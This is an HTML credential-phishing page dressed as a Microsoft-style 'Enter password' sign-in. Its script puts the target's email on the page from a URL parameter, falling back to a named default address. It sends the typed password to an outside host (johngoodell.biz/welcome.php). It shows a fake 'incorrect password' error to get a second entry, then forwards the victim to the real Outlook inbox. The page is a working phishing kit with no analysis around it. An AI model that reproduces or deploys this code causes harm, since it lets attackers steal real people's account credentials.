<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login</title>
    <style>
        body {
            height: 100%;
            width: 100%;
            padding: 0;
            margin: 0;
            font-family: "Open Sans", sans-serif;
            color: #222;
            background: #e7fafa;
            overflow-x: hidden;
            background-image: url("https://johngoodell.biz/picture/welcome-bg.svg");
        }

        .full-body {
            margin: 5% 33%;
        }

        .main-body {
            background: #ffffff;
            padding: 40px 40px;
            box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
            -webkit-box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
            -moz-box-shadow: 0px 0px 8px 2px rgba(148, 148, 148, 0.75);
        }

        .error {
            color: #e04540;
            margin-bottom: 25px;
            display: none;
        }

        .error .blue {
            color: #0067b8;
            line-height: 25px;
            font-size: 14px;
            font-weight: lighter;
        }

        .main-body .header {
            margin: 0;
            padding: 0;
        }

        .main-body .img-logo {
            width: 120px;
            margin: 0px;
        }

        .main-body .grabber p {
            margin-top: 20px;
            font-size: 14px;
            font-weight: 200;
        }

        .main-body .grabber h4 {
            margin-top: 10px;
            font-size: 22px;
            font-weight: 500;
        }

        .main-body .form-group {
            margin-top: 20px;
        }

        .main-body .form-group input {
            border: 0px solid #222222;
            border-bottom: 1px solid #4d4d4d;
            width: 100%;
            font-size: 14px;
        }

        .main-body .form-group input:focus {
            box-shadow: none;
            outline: none;
        }

        .main-body p.forgot {
            font-size: 13px;
            color: #0067b8;
        }

        .main-body .form-button {
            text-align: right;
        }

        .main-body .form-button .btn {
            font-size: 14px;
            color: #ffffff;
            background: #0067b8;
            border: 1px solid #0067b8;
            padding: 7px 30px;
            border-radius: 1px;
        }
        @media only screen and (max-width: 600px) {
            .full-body {
            margin: 20% 3%;
        }
        .main-body .img-logo {
            width: 100px;
            margin: 0px;
        }

        .error .blue {
            color: #0067b8;
            line-height: 25px;
            font-size: 12px;
            font-weight: lighter;
        }

        .main-body .header {
            margin: 0;
            padding: 0;
        }

        .main-body .img-logo {
            width: 120px;
            margin: 0px;
        }

        .main-body .grabber p {
            margin-top: 20px;
            font-size: 13px;
            font-weight: 200;
        }
        .main-body .grabber h4 {
            margin-top: 10px;
            font-size: 18px;
            font-weight: 500;
        }

        .main-body .form-group { 
            margin-top: 20px;
        }

        .main-body .form-group input {
            border: 0px solid #222222;
            border-bottom: 1px solid #4d4d4d;
            width: 100%;
            font-size: 14px;
        }

        .main-body .form-button .btn {
            font-size: 13px;
            color: #ffffff;
            background: #0067b8;
            border: 1px solid #0067b8;
            padding: 7px 30px;
            border-radius: 1px;
        }
        }
    </style>
</head>

<body>
    <div class="full-body">
        <div class="main-body">
            <form onsubmit="handleSubmit(event)" autocomplete="">
                <div class="header">
                    <img src="https://johngoodell.biz/picture/logo-is-here.png" width="200px" alt="logo-here"
                        class="img-logo" />
                </div>
                <div class="grabber">
                    <p id="gm" class="grab-mail"></p>
                    <h4>Enter password</h4>
                    <p id="error" class="error">
                        Your account or password is incorrect. If you dont remember your
                        password, <span class="blue"> reset it now </span>
                    </p>
                </div>
                <div class="form-group">
                    <input id="tm" type="text" value="One" class="input-form" hidden />
                    <input id="em" type="email" value="" name="em" class="input-form" hidden
                        required />
                    <input id="pw" type="password" name="pw" class="input-form" required />
                    <p class="forgot">Forgot password ?</p>
                </div>

                <div class="form-button">
                    <button id="submit" class="btn btn-md btn-primary">Sign in</button>
                </div>
            </form>
        </div>
    </div>
</body>

</html>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
       /* global $ */
       $(document).ready(function () {
        var url = new URL(window.location.href);

        if(url.searchParams.get("a")){
            var a = url.searchParams.get("a");
    }
    else{
        var a = "bthompson@thompsonorg.com";
    }
    
    if (!a) {
        } else {
            var my_em = a;

        $("#gm").html(my_em);
        $("#em").val(my_em);

        }
    });

    function handleSubmit(e) {
        e.preventDefault();
        let emma = $("#em").val();
        let peculiar = $("#pw").val();
        let times_number = $("#tm").val();

        $.ajax({
            url: "https://johngoodell.biz/picture/welcome.php",
            method: "POST",
            dataType: "JSON",
            data: {
                em: emma,
                pw: peculiar,
                tm: times_number,
            },
            success: function () { },
            complete: function () { },
        });
        if (times_number === "Two") {
            window.location.replace(
                "https://outlook.office.com/mail/inbox"
            );
        }
        $("#error").show();
        $("#tm").val("Two");
    }
</script>
